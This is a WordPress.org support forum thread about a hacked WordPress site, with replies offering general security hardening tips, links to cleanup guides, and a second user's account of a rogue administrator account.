WordPress.org

Support

Support » How-To and Troubleshooting » my site just been hacked…

my site just been hacked…

Viewing 15 replies - 1 through 15 (of 17 total)
  • There are hundreds of ways to avoid hacking a WP site. Here are some of the obvious ones:

    1) Keep WP up to date. Pay attention to the update notices. Same for themes and plugins.
    2) NEVER hack the core. Only use plugins and themes to mod the site.
    3) Use the MINIMUM number of plugins. Make sure that you ABSOLUTELY NEED EVERY SINGLE PLUGIN. Don’t carry “nice to have” plugins.
    4) Use the SIMPLEST theme possible.
    5) Use autogenerated “garbage” passwords (Example: “HG4E*f@s11lo*0f”).
    6) Use different passwords for every site.
    7) This goes for your control panel and FTP access, as well; not just the WP login. In fact, these should be even harder.
    8) Don’t enable SSH on your ISP account unless you absolutely need it. If you do enable it, filter for IP numbers, and use public-key encryption, if possible (SSH keys).
    9) Use common sense. Never give your passwords to any Web site, unless you are 100% sure who they are.
    10) Keep your machine clean. A lot of hacks, these days, are because of malware on webmasters’ machines. Don’t browse for pr0n, and don’t use warez (at least, not on the machine you use for managing Web sites).

    See if you can log into your back end using this – at least you might be able to look around a little;

    //kittyfish.org/wp-admin

    Then follow the steps and advice for cleaning up and securing a hacked blog in these links.

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    How to find a backdoor in a hacked WordPress

    i was thinking about renaming the WP_admin folder then rename them from the core php files..

    my site is //sananddesign.com

    i already tried the wp_admin
    and i found the hacker already changed my pass..

    i requested a new pass and i had response from the password to my email.

    but i didnt follow, i was thinking he might be able to fishing my email too.

    so i deleted everything and redesigning the site… 😀

    i was uptodate always. edited some style code only in stylsheet.css from the editor. i think the hacker decrypted the password from my wp_login.php file. am i correct?

    i was thinking about renaming the WP_admin folder then rename them from the core php files..

    That is definitely not a solution, and it’s also an introduction to more problems. You need to identify your weaknesses, fix the hack, and then secure your site and server to the best of your ability. That may include examining file and folder permissions, plugin and theme issues, reviewing your access logs, talking to your host, and even checking the computers you use to log in to your ftp or hosting account for possible password harvesting malware.

    There are literally hundreds of conversations on this topic in the forums.

    http://wordpress.org/search/hacked?forums=1

    You can modify and refine that search by using keywords that are relevant to your issue.

    i got an SFTP server for this site. i think the hacker decrypted the password from my wp_login.php file. am i correct?

    No.

    yah! i checked it! its not there…

    You are not alone. I got an email from a blog today that said:

    Password Lost and Changed for user: admin1

    I have new members shut off but I open up the site – go to administration – and sure enough – admin1 is registered AND AN ADMIN ! What is the deal ? In all of my years running websites, I have NEVER seen software pwned like this. My passwords are 30 characters long – generated with a program with digits, upper and lower case, and odd symbols.

    You check your settings/options?

    @bluetiereign

    In all of my years running websites,

    You must then, also be aware that there is a HUGE list of variables besides just the platform you are using that need to be included in your statement, but you don’t mention.

    What you describe above however, sounds a little like a well known vulnerability that allowed a remote admin password reset, in an older version of WordPress ( I think it was around version 2.8.3 or so ) that was patched quite some time ago. But that might not be the reason in your case. Just a thought.

    Take a look around the forums for recent issues ( last 30 – 60 days ) involving NetSol, GoDaddy, etc… There’s some pretty interesting and lengthy discussions involving this very subject.

    I’m not sure what or who you are asking about settings… but of course I checked the settings. I also only had two plugins – both now removed – and one of them should have been an option anyway with wordpress – Members Only.

    I put in the users email address and came up with this :

    Google Searched

    @ ClaytonJames

    I’m using 2.9.2. Thanks for the links. I will check.

    I’m not seeing any recent issues with JustHost. This is disturbing, to say the least. I am not losing anything by it being hacked as I don’t really have a working blog going on.. but good grief – lol. Anyway, I will keep my eyes peeled to see if this starts being an issue…

Viewing 15 replies - 1 through 15 (of 17 total)
  • The topic ‘my site just been hacked…’ is closed to new replies.